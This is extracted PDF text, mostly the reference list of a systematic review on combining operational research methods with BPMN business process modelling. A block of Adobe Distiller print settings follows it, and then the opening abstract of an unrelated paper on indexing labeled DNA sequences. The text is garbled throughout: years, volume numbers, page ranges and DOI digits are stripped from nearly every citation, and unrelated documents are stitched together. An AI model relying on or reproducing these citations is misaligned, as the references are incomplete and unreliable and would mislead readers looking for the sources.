agatz n, erera a, savelsbergh m, wang x. . optimization for dynamic ride-sharing: a review. european journal of operational research ( ): – doi . /j.ejor. . . . aguilar-saven rs. . business process modelling: review and framework. international journal of production economics ( ): – doi . /s - ( ) - . aysolmaz b, iren d, demirors o. . an effort prediction model based on bpm measures for process automation. in: nurcan s, proper h, soffer p, krogstie j, schmidt r, halpin t, bider i, eds. enterprise, business-process and information systems modeling, bpmds . volume of lecture notes in business information processing. th international conference on business process modeling, development, and support (bpmds) / th international conference on exploring modeling methods for systems analysis and design (emmsad), caise, valencia, spain, june – , , – . bacovsky m, gavalec m, tomaskova h. . inverse fuzzy eigenproblem in databases. in: vojackova h, ed. mathematical methods in economics , pts i and ii. st international conference on mathematical methods in economics, jihlava, czech republic, sep – , , – . bahaweres rb, fitriyah a, rozy nf. . comparative analysis of business process litigation using queue theory and simulation (case study: religious courts of south jakarta). in: th international conference on cyber and it service management (citsm ), august – , , denpasar, indonesia. – . batoulis k, weske m. . soundness of decision-aware business processes. in: carmona j, engels g, kumar a, eds. business process management forum, lecture notes in business information processing, vol. , – , signavio; celonis; ibm; diputacio tarragona; bizagi; ca technologies; dcr; myinvenio. th international conference on business process management (bpm), barcelona, spain, september – , . tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ birge jr, louveaux f. . introduction to stochastic programming. berlin: springer science & business media. bocciarelli p, d’ambrogio a. . automated performance analysis of business processes. in: wainer g, mosterman p, dambrogio a, zacharewicz g, eds. theory of modeling and simulation - devs integrative m&s symposium (devs ), volume of simulation series. – , soc modeling & simulat. theory of modeling and simulation - devs integrative m&s symposium (devs ), orlando, fl, march – , . braghetto kr, ferreira je, vincent j-m. . performance evaluation of business processes through a formal transformation to san. in: thomas n, ed. computer performance engineering, volume of lecture notes in computer science. + th european performance engineering workshop, epew , borrowdale, united kingdom, october – , . burattin a, sperduti a, veluscek m. . business models enhancement through discovery of roles. in: ieee symposium on computational intelligence and data mining (cidm). – , ieee; ieee computat intelligence soc. ieee symposium on computational intelligence and data mining (cidm), april – , . piscataway: ieee. ceballos hg, flores-solorio v, garcia-vazquez jp. . towards probabilistic decision making on human activities modeled with business process diagrams. in: proceedings of the international conference on autonomous agents & multiagent systems (aamas’ ), – , assoc comp machinery; ifaamas; nsf; artificial intelligence; acm sigai; argela; microsoft res; fundamentals collect adapt sysgt; japan soc software sci & technol; teknoparkistanbul; acm in cooperat. th international conference on autonomous agents and multiagent systems (aamas), istanbul, turkey, may – , . ceballos hg, flores-solorio v, pablo garcia j. . a probabilistic bpmn normal form to model and advise human activities. in: baldoni m, baresi l, dastani m, eds. engineering multi-agent systems, emas , volume of lecture notes in artificial intelligence. – , rd international workshop on engineering multi-agent systems (emas), turkey, may , . certo s. . influencing initial public offering investors with prestige: signaling with board structures. academy of management review ( ): – doi . /amr. . . cheng y, zhao s, cheng b, chen x, chen j. . modeling and deploying iot-aware business process applications in sensor networks. sensors ( ): doi . /s . chinosi m, trombetta a. . bpmn: an introduction to the standard. computer standards & interfaces ( ): – doi . /j.csi. . . . cho sy, happa j, creese s. . capturing tacit knowledge in security operation centers. ieee access : – doi . /access. . . cimler r, cimr d, kuhnova j, tomaskova h. . novel effective algorithm for synchronization problem in directed graph. in: nguyen n, papadopoulos g, jedrzejowicz p, trawinski b, vossen g, eds. computational collective intelligence, iccci , pt i, volume of lecture notes in artificial intelligence. – , univ cyprus; wroclaw univ sci & technol. th international conference on computational collective intelligence (iccci), nicosia, cyprus, september – , . cimler r, tomaskova h, kuhnova j, dolezal o, pscheidl p, kuca k. . numeric, agent-based or system dynamics model? which modeling approach is the best for vast population simulation? current alzheimer research ( ): – doi . / . cimr d, cimler r, tomaskova h. . construction of an optimal timetable schedule in accordance with user preferences using the graph coloring algorithm. in: soliman k, ed. innovation management and education excellence through vision , vols i -xi. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /amr. . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.csi. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ – , int business informat management assoc. st international-business- information-management-association conference, milan, italy, april – , . clarivate analytics. . keywords plus generation, creation, and changes. available at https://support.clarivate.com/scientificandacademicresearch/s/article/keywords-plus- generation-creation-and-changes?language=en_us (accessed july ). clarivate analytics. . web of science categories. available at https://images.webofknowledge. com/images/help/wos/hp_subject_category_terms_tasca.html (accessed july ). cobo mj, lópez-herrera ag, herrera-viedma e, herrera f. . science mapping software tools: review, analysis, and cooperative study among tools. journal of the american society for information science and technology ( ): – doi . /asi. . dani vs, freitas cmds, thom lh. . ten years of visualization of business process models: a systematic literature review computer standards & interfaces : . dantzig gb. . linear programming and extensions. vol. . princeton: princeton university press. de ramon fernandez a, ruiz fernandez d, sabuco garcia y. . business process management for optimizing clinical processes: a systematic literature review. health informatics journal ( ): – doi . / . de smedt j, hasic f, van den broucke sklm, vanthienen j. . holistic discovery of decision models from process execution data. knowledge-based systems : doi . /j.knosys. . . dedrick j, gurbaxani v, kraemer k. . information technology and economic performance: a critical review of the empirical evidence. acm computing surveys ( ): – doi . / . . dorfman r, samuelson pa, solow rm. . linear programming and economic analysis. chelmsford: courier corporation. dubey sk. . a review on relation between operation research and different field of sciences. international journal of advanced research in computer science ( ): – . duran f, rocha c, salaun g. . stochastic analysis of bpmn with time in rewriting logic. science of computer programming : – doi . /j.scico. . . . durán f, rocha c, salaün g. . a rewriting logic approach to resource allocation analysis in business process models. science of computer programming : doi . /j.scico. . . euler l. . lettres a une princesse d’allemagne. letters : – . figl k, mendling j, tokdemir g, vanthienen j. . what we know and what we do not know about dmn. enterprise modelling and information systems architectures : – . garcia r. . uses of agent-based modeling in innovation/new product development research. journal of product innovation management ( ): – doi . /j. - . . .x. gavalec m, mls k, tomaskova h. . optimization of the ordinal and cardinal consistency of a preference matrix in decision making. in: alonso j, bustince h, reformat m, eds. proceedings of the conference of the international fuzzy systems association and the european society for fuzzy logic and technology, volume of advances in intelligent systems research. – , int fuzzy syst assoc; european soc fuzzy log & technol. th world congress of the international-fuzzy-systems-association (ifsa)/ th conference of the european-society-for- fuzzy-logic-and-technology (eusflat), gijon, spain, june –july , . tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / https://support.clarivate.com/scientificandacademicresearch/s/article/keywords-plus-generation-creation-and-changes?language=en_us https://support.clarivate.com/scientificandacademicresearch/s/article/keywords-plus-generation-creation-and-changes?language=en_us https://images.webofknowledge.com/images/help/wos/hp_subject_category_terms_tasca.html https://images.webofknowledge.com/images/help/wos/hp_subject_category_terms_tasca.html http://dx.doi.org/ . /asi. http://dx.doi.org/ . / http://dx.doi.org/ . /j.knosys. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /j.scico. . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gavalec m, plavka j, tomaskova h. . interval eigenproblem in max-min algebra. linear algebra and its applications : – doi . /j.laa. . . . gavalec m, tomaskova h. . eigenspace of a circulant max-min matrix. kybernetika ( , si): – international conference on mathematical methods in economy and industry, univ s bohemia, ceske budejovice, czech republic, june – , . ghlala r, aouina zk, ben said l. . mc-dmn: meeting mcdm with dmn involving multi- criteria decision-making in business process. in: gervasi o, murgante b, misra s, borruso g, torre cm, rocha amac, taniar d, apduhan bo, stankova e, cuzzocrea a, eds. computational science and its applications - iccsa , pt vi, volume of lecture notes in computer science. – , univ trieste; univ perugia; univ basilicata; monash univ; kyushu sangyo univ; univ minho. th international conference on computational science and its applications (iccsa), trieste, italy, july – , . glassey o. . a case study on process modelling—three questions and three techniques. decision support systems ( ): – doi . /j.dss. . . . graczyk-kucharska m, Özmen a, szafrański m, weber gw, golińśki m, spychaa m. . knowledge accelerator by transversal competences and multivariate adaptive regression splines. central european journal of operations research ( ): – . gu j, goetschalckx m, mcginnis lf. . research on warehouse design and performance evaluation: a comprehensive review. european journal of operational research ( ): – doi . /j.ejor. . . . gómez-martnez e, pérez-blanco f, de lara j, vara jm, marcos e. . formal support of process chain networks using model-driven engineering and petri nets. in: proceedings of the th acm/sigapp symposium on applied computing. – . hasic f, de smedt j, vanthienen j. . augmenting processes with decision intelligence: principles for integrated modelling. decision support systems : – doi . /j.dss. . . . herbert lt, hansen znl. . restructuring of workflows to minimise errors via stochastic model checking: an automated evolutionary approach. reliability engineering & system safety : – , th international association for probabilistic safety assessment and management (psam ) conference, honolulu, hi, june – , . herbert lt, hansen z, jacobsen p. . sbat: a stochastic bpmn analysis tool. in: proceedings of the asme th biennial conference on engineering systems design and analysis— , asme. th asme biennial conference on engineering systems design and analysis (esda ), copenhagen, denmark, june – , , vol. . herbert l, hansen znl, jacobsen p. . using quantitative stochastic model checking tool to increase safety and improve efficiency in production processes. in: nowakowski t, mlynczak m, jodejkopietruczuk a, werbinskawojciechowska s, eds. safety and reliability: methodology and applications. – , wroclaw univ technol; polish safety & reliabil assoc; european safety & reliabil assoc. proceedings of the european safety and reliability conference (esrel), wroclaw, poland, september – , . herbert l, hansen znl, jacobsen p, cunha p. . evolutionary optimization of production materials workflow processes. in: constantinescu c, bauer w, sauer o, maropoulos p, eds. th international conference on digital enterprise technology - det disruptive innovation in manufacturing engineering towards the th industrial revulution, volume of procedia cirp. – , int acad prod engn; fraunhofer inst ind engn iao. th international conference on digital enterprise technology (det), stuttgart, germany, march – , . tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.laa. . . http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ herbert lt, sharp r. . quantitative analysis of probabilistic bpmn workflows. in: proceedings of the asme international design engineering technical conferences and computers and information in engineering conference , vol , pts a and b. – , asme, design engn div; asme, comp & informat engn div. asme international design engineering technical conferences/computers information in engineering conference, chicago, il, august – , . herbert l, sharp r. . precise quantitative analysis of probabilistic business process model and notation workflows. journal of computing and information science in engineering ( ): doi . / . . herbert l, sharp r. a. workflow fault tree generation through model checking. in: steenbergen r, vangelder p, miraglia s, vrouwenvelder a, eds. safety, reliability and risk analysis: beyond the horizon. – , netherlands org appl sci res; delft univ technol; dutch soc risk management & reliabil anal; european safety & reliabil assoc. nd annual conference on european safety and reliability (esrel), amsterdam, netherlands, september –october , . herbert lt, sharp r. b. optimisation of bpmn business models via model checking. in: proceedings of the asme international design engineering technical conferences and computers and information in engineering conference, . asme, design engn div; asme, comp & informat engn div. asme international design engineering technical conferences/computers and information in engineering conference (idetc/cie), portland, or, august – , , vol. b. higgins j, lasserson t, chandler j, tovey d, churchill r. . methodological expectations of cochrane intervention reviews. london: cochrane. jaafari a. . criticism of cpm for project planning analysis. journal of construction engineering and management ( ): – doi . /(asce) - ( ) : ( ). kall p, wallace sw, kall p. . stochastic programming. berlin: springer. kalogirou sa. . artificial intelligence for the modeling and control of combustion processes: a review. progress in energy and combustion science ( ): – doi . /s - ( ) - . kamrani f, ayani r, moradi f, holm g. . estimating performance of a business process model. in: proceedings of the winter simulation confernce (wsc, ), vol. – . winter simulation conference proceedings, pages +. ieee. winter simulation conference , austin, tx, december – , . piscataway: ieee. khlif w, ben-abdallah h. . semantic and structural performer clustering in bpmn models transformed into social network models. in: lorenz p, maciaszek l, eds. th international joint conference on software technologies (icsoft). vol. , – inst syst & technologies informat control & commun; univ haute alsace; ieice special interest grp software interprise modelling; ieee comp soc tech council software engn; scitevents; scitepress; univ upper alsace; univ haute alsace; ieee comp soc; tcse. th international conference on software technologies (icsoft), colmar, france, july – , . piscataway: ieee. khlif w, ben-abdallah h, ben ayed ne. . a methodology for the semantic and structural restructuring of bpmn models. business process management journal ( ): – doi . /bpmj- - - . kitchenham b, charters s. . guidelines for performing systematic literature reviews in software engineering. technical report ebse - , keele university and durham university joint report. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /(asce) - ( ) : ( ) http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bpmj- - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kocbek m, jost g, hericko m, polancic g. . business process model and notation: the current state of affairs. computer science and information systems ( ): – doi . /csis k. kopecky m, tomaskova h. . activity based costing and process simulations. in: jedlicka p, maresova p, soukal i, eds. hradec economic days, vol. , issue i, hradec economic days. – , univ hradec kralove, fac informat & management; wroclaw univ econ; cracow univ econ; univ s bohemia, off transfer technologies; czech natl bank. th international scientific conference on hradec economic days, hradec kralove, czech republic, february – , . kopecky m, tomaskova h. . the business process model and notation used for the representation of alzheimer’s disease patients care process. data ( ): doi . /data . kozlowski swj, chao gt, grand ja, braun mt, kuljanin g. . advancing multilevel research design: capturing the dynamics of emergence. organizational research methods ( ): – doi . / . krenek j, kuca k, krejcar o, maresova p, sobeslav v, blazek p. . artificial neural network tools for computerised data modeling and processing. in: ieee th international symposium on computational intelligence and informatics (cinti), international symposium on computational intelligence and informatics. – , ieee hungary sect; ieee computat intelligence chapter; ieee joint chapter robot automat & ind elect soc; ieee smc soc; obuda univ; hungarian fuzzy ass. budapest, bahrain, november – , . piscataway: ieee. krogstie j, sindre g, jorgensen h. . process models representing knowledge for action: a revised quality framework. european journal of information systems ( ): – . lane ms, mansour ah, harpell jl. . operations research techniques: a longitudinal update – . interfaces ( ): – doi . /inte. . . . maltz e, kohli a. . market intelligence dissemination across functional boundaries. journal of marketing research ( ): – doi . / . maresova p. . knowledge management in czech enterprises. e & m ekonomie a management ( ): – . maresova p, sobeslav v, krejcar o. . cost-benefit analysis—evaluation model of cloud computing deployment for use in companies. applied economics ( ): – doi . / . . . maresova p, tomaskova h, kuca k. . the use of simulation modelling in the analysis of the economic aspects of diseases in old age. in: bilgin m, danis h, demir e, can u, eds. business chammenges in the changing economic landscape. vol. , – eurasia business & econ soc. th conference of the eurasia-business-and-economics-society (ebes), barcelona, spain, october – , . mazhar s, wu pp-y, rosemann m. . designing complex socio-technical process systems— the airport example. business process management journal ( ): – doi . /bpmj- - - . melao n, pidd m. . a conceptual framework for understanding business processes and business process modelling. information systems journal ( ): – doi . /j. - . . .x. mendoza morales le, monsalve c, villavicencio m. . formal verification of business processes as timed automata. in: th iberian conference on information systems and technologies (cisti), iberian conference on information systems and technologies. assoc iberica sistemas tecnologias informaco; inst univ lisboa; asoc tecnicos informatica; assoc tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /csis k http://dx.doi.org/ . /data http://dx.doi.org/ . / http://dx.doi.org/ . /inte. . . http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . /bpmj- - - http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ portuguesa empreendedorismo; ieee smc; ieee portugal sect; fca; lidel; sas; silabo; tap. lisbon, portugal, june – , . piscataway: ieee. moher d, liberati a, tetzlaff j, altman dg, group tp. . preferred reporting items for systematic reviews and meta-analyses: the prisma statement. plos medicine ( ): – . mryglod o, kenna r, holovatch y, berche b. . comparison of a citation-based indicator and peer review for absolute and specific measures of research-group excellence. scientometrics ( ): – doi . /s - - - . naoum m, el hichami o, al achhab m, el mohajir be. . a probabilistic method for business process verification: reachability, liveness and deadlock detection. in: elmohajir m, chahhou m, alachhab m, elmohajir b, eds. th ieee international colloquium on information science and technology (cist), colloquium in information science and technology. – , ieee; ieee comp soc; ieee commun soc; innov org; ensias; qatar univ; akhawayn univ; technische univ munchen; insa rouen; ieee morocco sect; ieee morocco comp & commun joint chapter. tangier, morocco, october – , , piscataway: ieee. negahban a, smith js. . simulation for manufacturing system design and operation: literature review and analysis. journal of manufacturing systems ( ): – doi . /j.jmsy. . . . nisler j, tomaskova h. . bpmn as a quality tool for the efficient functioning of the company. in: soliman k, ed. vision : sustainable economic development, innovation management, and global growth. vol. i-ix, – , business inform management assoc. th international business-information-management-association conference, spain, nov – , . nutt pc. . implementation approaches for project planning. academy of management review ( ): – . omg.org. . history of formal versions. available at https://www.omg.org/spec/bpmn (accessed november ). onggo bss, proudlove nc, d’ambrogio sa, calabrese a, bisogno s, ghiron nl. . a bpmn extension to support discrete-event simulation for healthcare applications: an explicit representation of queues, attributes and data-driven decision points. journal of the operational research society ( ): – doi . /s - - - . oudah m, jabeen f, dixon c. . determinants linked to family business sustainability in the uae: an ahp approach. sustainability ( ): doi . /su . pellerin r, perrier n, berthaut f. . a survey of hybrid metaheuristics for the resource- constrained project scheduling problem. european journal of operational research ( ): – doi . /j.ejor. . . . recker j. . bpmn research: what we know and what we don’t know. in: international workshop on business process modeling notation, berlin, heidelberg: springer, – . recker j, rosemann m, indulska m, green p. . business process modeling-a comparative analysis. journal of the association for information systems ( ): – doi . / jais. . rekik m, boukadi k, ben-abdallah h. . specifying business process outsourcing requirements. in: lorenz p, cardoso j, maciaszek l, vansinderen m, eds. software technologies (icsoft ), volume of communications in computer and information science. inst syst & technologies informat control & commun; univ haute alsace; ieice special interest grp software interprise modelling; ieee comp soc tech council software engn. th international conference on software technologies (icsoft), colmar, france, july – , , – . piscataway: ieee. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.jmsy. . . https://www.omg.org/spec/bpmn http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /su http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . / jais. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ repenning n. . a simulation-based approach to understanding the dynamics of innovation implementation. organization science ( ): – doi . /orsc. . . . . sadiq w, orlowska m. . analyzing process models using graph reduction techniques. information systems ( ): – . sarac a, absi n, dauzère-pérès s. . a literature review on the impact of rfid technologies on supply chain management. international journal of production economics ( ): – doi . /j.ijpe. . . . savku e, weber g-w. . a stochastic maximum principle for a markov regime-switching jump-diffusion model with delay and an application to finance. journal of optimization theory and applications ( ): – doi . /s - - - . schrijver a. . theory of linear and integer programming. hoboken: john wiley & sons. shane s, cable d. . network ties, reputation, and the financing of new ventures. management science ( ): – doi . /mnsc. . . . . shannon re, long ss, buckles bp. . operation research methodologies in industrial engineering: a survey. aiie transactions ( ): – doi . / . shapiro a, dentcheva d, ruszczy�nski a. . lectures on stochastic programming: modeling and theory. philadelphia: siam. silver b. . bpmn method and style: a levels-based methodology for bpm process modeling and improvement using bpmn . . san francisco: cody-cassidy press. sterman j. . learning in and about complex-systems. system dynamics review ( – ): – doi . /sdr. . subramanian n, ramanathan r. . a review of applications of analytic hierarchy process in operations management. international journal of production economics ( ): – doi . /j.ijpe. . . . suchenia a, kluza k, wisniewski p, jobczyk k, ligeza a. . towards knowledge interoperability between the uml, dmn, bpmn and cmmn models. matec web of conferences :e . the object management group. . the business process model and notation specification. available at http://www.omg.org/spec/bpmn/ . / (accessed october ). tomaskova h. . marketing research of mobile technology used by firms like advantage. in: perlovsky l, dionysiou d, zadeh l, kostic m, gonzalezconcepcion c, jaberg h, eds. aebd ‘ : proceedings of the world multiconference on applied economics, business and development, recent advances in computer engineering, spain. – . tomaskova h. . levels of business process modeling. in: soliman k, ed. vision : sustainable economic development, innovation management, and global growth. business inform management assoc. th international business-information-management-association conference, madrid, spain, november – , , vol. i–ix, – . tomaskova h. . modeling business processes for decision-making. in: soliman k, ed. innovation management and education excellence through vision . int business informat management assoc. st international-business-information-management-association conference, milan, italy, april – , , vol. i-xi, – . tomaskova h, gavalec m. . decision making based on tropical algebra. in: vojackova h, ed. mathematical methods in economics , pts i and ii. – , st international conference on mathematical methods in economics, jihlava, czech republic, september – , . tomaskova h, gavalec m. . max-prod eigenvectors and their applications in decision making. in: talasova j, stoklasa j, talasek t, eds. mathematical methods in economics tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /orsc. . . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /mnsc. . . . http://dx.doi.org/ . / http://dx.doi.org/ . /sdr. http://dx.doi.org/ . /j.ijpe. . . http://www.omg.org/spec/bpmn/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (mme ). – , nd international conference on mathematical methods in economics (mme), olomouc, czech republic, september – , . tomaskova h, kopecky m, maresova p. . process cost management of alzheimer’s disease. processes ( ): doi . /pr . tomaskova h, kuhnova j, cimler r, dolezal o, kuca k. . prediction of population with alzheimer’s disease in the european union using a system dynamics model. neuropsychiatric disease and treatment : – doi . /ndt.s . tomaskova h, kuhnova j, kuca k. . economic model of alzheimer’s disease. in: soliman k, ed. innovation vision : from regional development sustainability to global economic growth. th international-business-information-management-association conference, amsterdam, netherlands, may – , , vol. i–vi, . tomaskova h, maresova p, penhaker m, augustynek m, klimova b, fadeyi o, kuca k. . the business process model and notation of open innovation: the process of developing medical instrument. journal of open innovation: technology, market, and complexity ( ): doi . /joitmc . tsakalidis g, vergidis k, kougka g, gounaris a. . eligibility of bpmn models for business process redesign. information-an international interdisciplinary journal ( ): doi . /info . van der aalst w, adriansyah a, van dongen b. . replaying history on process models for conformance checking and performance analysis. wiley interdisciplinary reviews: data mining and knowledge discovery ( ): – doi . /widm. . van der aalst wmp, reijers ha, weijters ajmm, van dongen bf, de medeiros aka, song m, verbeek hmw. . business process mining: an industrial application. information systems ( ): – doi . /j.is. . . . van eck nj, waltman l, dekker r, van den berg j. . a comparison of two techniques for bibliometric mapping: multidimensional scaling and vos. journal of the american society for information science and technology ( ): – doi . /asi. . velasquez m, hester pt. . an analysis of multi-criteria decision making methods. international journal of operations research ( ): – . venn j. . i. on the diagrammatic and mechanical representation of propositions and reasonings. london, edinburgh, and dublin philosophical magazine and journal of science ( ): – doi . / . white sa. . bpmn modeling and reference guide: understanding and using bpmn. usa: future strategies inc., lighthouse point. wu pp-y, fookes c, pitchforth j, mengersen k. . a framework for model integration and holistic modelling of socio-technical systems. decision support systems : – doi . /j.dss. . . . xie y, chien c-f, tang r-z. . a dynamic task assignment approach based on individual worklists for minimizing the cycle time of business processes. computers & industrial engineering : – doi . /j.cie. . . . xu x, wang l, newman st. . computer-aided process planning—a critical review of recent developments and future trends. international journal of computer integrated manufacturing ( ): – doi . / x. . . zarour k, benmerzoug d, guermouche n, drira k. . a systematic literature review on bpmn extensions. business process management journal doi . /bpmj- - - . zyoud sh, fuchs-hanusch d. . a bibliometric-based survey on ahp and topsis techniques. expert systems with applications : – doi . /j.eswa. . . . tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /pr http://dx.doi.org/ . /ndt.s http://dx.doi.org/ . /joitmc http://dx.doi.org/ . /info http://dx.doi.org/ . /widm. http://dx.doi.org/ . /j.is. . . http://dx.doi.org/ . /asi. http://dx.doi.org/ . / http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /j.cie. . . http://dx.doi.org/ . / x. . http://dx.doi.org/ . /bpmj- - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approaches combining methods of operational research with business process model and notation: a systematic review introduction related works and background research methodology results discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice indexing labeled sequences indexing labeled sequences tatiana rocher, mathieu giraud and mikaël salson université de lille, cnrs, centrale lille, inria, umr cristal, lille, france abstract background: labels are a way to add some information on a text, such as functional annotations such as genes on a dna sequences. v(d)j recombinations are dna recombinations involving two or three short genes in lymphocytes. sequencing this short region ( bp or less) produces labeled sequences and brings insight in the lymphocyte repertoire for onco-hematology or immunology studies. methods: we present two indexes for a text with non-overlapping labels. they store the text in a burrows–wheeler transform (bwt) and a compressed label sequence in a wavelet tree. the label sequence is taken in the order of the text (tl-index) or in the order of the bwt (tlbw-index). both indexes need a space related to the entropy of the labeled text. 